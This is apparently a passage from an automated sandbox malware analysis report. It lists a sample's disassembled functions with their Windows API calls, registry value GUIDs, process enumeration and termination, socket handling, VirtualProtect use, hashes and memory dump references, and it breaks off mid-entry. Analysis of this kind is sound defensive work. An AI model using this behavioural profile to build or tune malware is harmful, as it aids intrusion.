                                                                                                            • Opcode Fuzzy Hash: 41ec70808b806e0bef5bb364e64e8a15a425dccdf746cbfe31f727b4487b94bb
                                                                                                            • Instruction Fuzzy Hash: 7D41C378A50208EFCB09DF94D984BDEBBB5FB48300F208559F915A7390D734AA85DF50
                                                                                                            Function 003174C8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 78threadsynchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000,?,0031720B,?), ref: 003174EB
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031720B,?), ref: 00317523
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031720B,?), ref: 00317543
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0031720B,?), ref: 0031755B
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000004,00000000), ref: 0031757A
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 003175A8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleThread$EventObjectResumeSingleWait
                                                                                                            • String ID: d
                                                                                                            • API String ID: 3200977696-2564639436
                                                                                                            • Opcode ID: 51ba4d8a9389051623d77876660668bcade1f5a542e3a8534609227fd4dfe0c7
                                                                                                            • Instruction ID: a8f13aa3fafdcad54987306c13baae0413b641be411556b343a4357972eefdd4
                                                                                                            • Opcode Fuzzy Hash: 51ba4d8a9389051623d77876660668bcade1f5a542e3a8534609227fd4dfe0c7
                                                                                                            • Instruction Fuzzy Hash: E83138B4A04209DFDB19CF94C888BAEB7B6FF48304F28C558E5196B390C375A985CF90
                                                                                                            Function 0030E020 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0030E08F
                                                                                                            • OpenEventW.KERNEL32(00100002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 0030E0CA
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030E0DD
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0030E0E7
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 0030E0F3
                                                                                                            • closesocket.WS2_32(?), ref: 0030E0FD
                                                                                                              • Part of subcall function 0030B6D0: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0030B701
                                                                                                              • Part of subcall function 0030B6D0: GetLastError.KERNEL32 ref: 0030B70C
                                                                                                              • Part of subcall function 0030B6D0: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030B724
                                                                                                              • Part of subcall function 0030B6D0: __snwprintf.LIBCMT ref: 0030B74E
                                                                                                              • Part of subcall function 0030B6D0: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0030B773
                                                                                                              • Part of subcall function 0030B6D0: GetLastError.KERNEL32 ref: 0030B77C
                                                                                                              • Part of subcall function 0030B6D0: LocalFree.KERNEL32(00000000), ref: 0030B7FC
                                                                                                              • Part of subcall function 0030B6D0: LocalFree.KERNEL32(00000000), ref: 0030B806
                                                                                                            Strings
                                                                                                            • {DD700AA6-D197-4A4A-838A-B93EA96F236B}, xrefs: 0030E0BE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$CreateErrorEventFreeLast$AllocCloseDirectoryFileHandleOpen__snwprintfclosesocketsetsockoptshutdown
                                                                                                            • String ID: {DD700AA6-D197-4A4A-838A-B93EA96F236B}
                                                                                                            • API String ID: 1062739783-1481857122
                                                                                                            • Opcode ID: e3295ba3ff9b17fb631bb8e124ad447e5026316ebb21e566e98e3353698ccd55
                                                                                                            • Instruction ID: 46d90ecaa5061944271bf984f5c4b27094a4a49e1a6518caff2cd0ac4b5226d6
                                                                                                            • Opcode Fuzzy Hash: e3295ba3ff9b17fb631bb8e124ad447e5026316ebb21e566e98e3353698ccd55
                                                                                                            • Instruction Fuzzy Hash: E7310871A00218AFDB25DFA4D859BAEBBB8FF48300F20862CE514A72D1D7B59944CF51
                                                                                                            Function 00304320 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304331
                                                                                                            • OpenEventW.KERNEL32(00000002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 00304383
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 00304396
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003043A0
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 003043D8
                                                                                                            • ResetEvent.KERNEL32(00000000), ref: 003043FB
                                                                                                            Strings
                                                                                                            • {DD700AA6-D197-4A4A-838A-B93EA96F236B}, xrefs: 0030437A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$CloseHandleObjectOpenResetSingleWait
                                                                                                            • String ID: {DD700AA6-D197-4A4A-838A-B93EA96F236B}
                                                                                                            • API String ID: 1560999653-1481857122
                                                                                                            • Opcode ID: 84f5cf93102c9c0886f6885e1d7bc027412f0b41a7c58050790bb96692cbdd45
                                                                                                            • Instruction ID: 288c8815a466cd19d916c49a3b6541d213e0e0ce039721ae7327e48a9c942b88
                                                                                                            • Opcode Fuzzy Hash: 84f5cf93102c9c0886f6885e1d7bc027412f0b41a7c58050790bb96692cbdd45
                                                                                                            • Instruction Fuzzy Hash: 222160B4903314EBCB3BABA4E96D76C77BCA710305F221499E709961E0CB719AE0CB51
                                                                                                            Function 00310010 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,00316B10,00371178,00316B10), ref: 00310023
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00310034
                                                                                                            • wnsprintfW.SHLWAPI ref: 0031005F
                                                                                                            • lstrlenW.KERNEL32(?), ref: 00310070
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 0031007F
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 0031008E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeTask$AllocFolderKnownLocalPathlstrlenwnsprintf
                                                                                                            • String ID: %s\%s
                                                                                                            • API String ID: 1665550476-4073750446
                                                                                                            • Opcode ID: 48c411a6527b94fc456fc75216f1c75597d7e7b7f639493b1e09492a30806b2a
                                                                                                            • Instruction ID: 3f0afa88a0674d9690fa32084cd0f225f1ae785f0370cd100f413f9f3e93e5b0
                                                                                                            • Opcode Fuzzy Hash: 48c411a6527b94fc456fc75216f1c75597d7e7b7f639493b1e09492a30806b2a
                                                                                                            • Instruction Fuzzy Hash: 43014074A44208FBD729DFA4DC89FAE7BB9EF4C701F108464FA09D6280D6759AC0CB50
                                                                                                            Function 00304770 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __snwprintf.LIBCMT ref: 0030478F
                                                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 003047A7
                                                                                                            • RegSetValueExW.ADVAPI32(?,{108D3252-20F0-4C1B-940D-6ED5366D8FD3},00000000,00000003,?,?), ref: 003047CA
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 003047D8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenValue__snwprintf
                                                                                                            • String ID: SOFTWARE\%s${108D3252-20F0-4C1B-940D-6ED5366D8FD3}
                                                                                                            • API String ID: 2100281157-2357458413
                                                                                                            • Opcode ID: c49227faee6afd3bd9a63385d0a950275562a797dbfc5ea62f506580dee1dfac
                                                                                                            • Instruction ID: 6863cd0e0ace417721a0ac6b5bc0dc793741b8f0a03b3af6856a5f3c8da448b0
                                                                                                            • Opcode Fuzzy Hash: c49227faee6afd3bd9a63385d0a950275562a797dbfc5ea62f506580dee1dfac
                                                                                                            • Instruction Fuzzy Hash: 390162B5604208FBD722DBA4DC99FAE337CEB08B00F104554BA199A180E675DB40A7A1
                                                                                                            Function 00309E40 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43registrymemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000208), ref: 00309E57
                                                                                                            • __snwprintf.LIBCMT ref: 00309E7C
                                                                                                            • RegGetValueW.ADVAPI32(80000001,?,{C3120582-398C-4F3B-A956-7E9F9DB9EF8E},00000002,00000000,00000000,00000208), ref: 00309EA8
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00309EC7
                                                                                                            Strings
                                                                                                            • SOFTWARE\%s, xrefs: 00309E6B
                                                                                                            • {C3120582-398C-4F3B-A956-7E9F9DB9EF8E}, xrefs: 00309E97
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 00309E66
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$AllocFreeValue__snwprintf
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C3120582-398C-4F3B-A956-7E9F9DB9EF8E}
                                                                                                            • API String ID: 3906065898-3858757917
                                                                                                            • Opcode ID: 3ff5ef62af59098bbe4ffae45720591b4503b5360bd15d942152390223d620ae
                                                                                                            • Instruction ID: cdbb84e4aee5d5d6df4d9b59dffd487d77a64ed40f8924ddfd743b63ff4df147
                                                                                                            • Opcode Fuzzy Hash: 3ff5ef62af59098bbe4ffae45720591b4503b5360bd15d942152390223d620ae
                                                                                                            • Instruction Fuzzy Hash: DD015E70A44208FBDB21DBA4DD4AFAEB7B8AB08700F204599B609A71C1D6B45F40DB91
                                                                                                            Function 00302490 Relevance: 12.1, APIs: 8, Instructions: 67processstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003024A4
                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 003024CC
                                                                                                            • lstrcmpiW.KERNEL32(?,-00372F28), ref: 0030251A
                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0030253C
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0030255A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00302567
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0030257F
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00302591
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32lstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 1193533834-0
                                                                                                            • Opcode ID: af2a378b2d13210f92e96c9b081ae896423b10f12746aabbf9f4302172754b5f
                                                                                                            • Instruction ID: 0501261c074948cf1e808c96983da0f7b45bb767a50647cc8e6e16cd158145b6
                                                                                                            • Opcode Fuzzy Hash: af2a378b2d13210f92e96c9b081ae896423b10f12746aabbf9f4302172754b5f
                                                                                                            • Instruction Fuzzy Hash: FB21EC71911218DBDB35DF60DD9CBAABBB8FB45700F104698E509A61D0D7749AC0DF50
                                                                                                            Function 0031E820 Relevance: 10.7, APIs: 7, Instructions: 200memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000FA0), ref: 0031E862
                                                                                                            • und_memcpy.LIBCMTD ref: 0031E888
                                                                                                            • und_memcpy.LIBCMTD ref: 0031E8A3
                                                                                                            • und_memcpy.LIBCMTD ref: 0031E8D7
                                                                                                            • VirtualProtect.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0031EAE5
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031EBAB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: und_memcpy$Local$AllocFreeProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3065580769-0
                                                                                                            • Opcode ID: ed291c51b19c91f21696e62e6d0bc671c3a24b8323aa921462d323f583373041
                                                                                                            • Instruction ID: 0959dd1f87c69df84d341fcdd68b8a95b37ccf0c882983e9d78f7432f14381a6
                                                                                                            • Opcode Fuzzy Hash: ed291c51b19c91f21696e62e6d0bc671c3a24b8323aa921462d323f583373041
                                                                                                            • Instruction Fuzzy Hash: 5BA1B170A05228CBDB6ACF04CD85BDAB7B5BB98305F1481D9D84DAB254D736AEC1CF80
                                                                                                            Function 00307260 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 157COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 003072DB
                                                                                                            • _memset.LIBCMT ref: 0030732B
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 00307595
                                                                                                            • closesocket.WS2_32(?), ref: 0030759F
                                                                                                              • Part of subcall function 00320CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00320CED
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale___crt_memsetclosesocketsetsockoptshutdown
                                                                                                            • String ID: $#
                                                                                                            • API String ID: 2801799075-2491617062
                                                                                                            • Opcode ID: 271ad7f5714bf85164f14a22e7530f9184655c4f4efc39c5058929d9b85f535c
                                                                                                            • Instruction ID: 48c969444cfc326f501b7403740e22a2c3ca24e4522a30c675990b03ec7aa692
                                                                                                            • Opcode Fuzzy Hash: 271ad7f5714bf85164f14a22e7530f9184655c4f4efc39c5058929d9b85f535c
                                                                                                            • Instruction Fuzzy Hash: E58116B0D0522DDBEB24DF40DC59BEEBBB5BB44304F2082E9D5486B281D7B65A88CF51
                                                                                                            Function 003090B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 131synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 00309164
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0030919C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003091D2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00309222
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0030928C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                                                            • String ID: d
                                                                                                            • API String ID: 971639600-2564639436
                                                                                                            • Opcode ID: db41af8d911c59fcb974fd8868cecd6908ea9efa5762bec9534ad1f9fb9bfea6
                                                                                                            • Instruction ID: 5d6330020507bbaa9af0e9cd5572788480bc3f9e48b4da4ede71b4b81503c1b9
                                                                                                            • Opcode Fuzzy Hash: db41af8d911c59fcb974fd8868cecd6908ea9efa5762bec9534ad1f9fb9bfea6
                                                                                                            • Instruction Fuzzy Hash: 3A51A271A00508EBEB1ADFC4C9E8B6EB77AFB90305F108669D016AF6C2C735DA41CB41
                                                                                                            Function 003068B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 00306932
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0030696A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00306987
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003069D7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                                                            • String ID: d
                                                                                                            • API String ID: 2857295742-2564639436
                                                                                                            • Opcode ID: 07066e7839e8ab705ae0eb1ac891b3da5b9de1e5cc15b9871e913db4c1634347
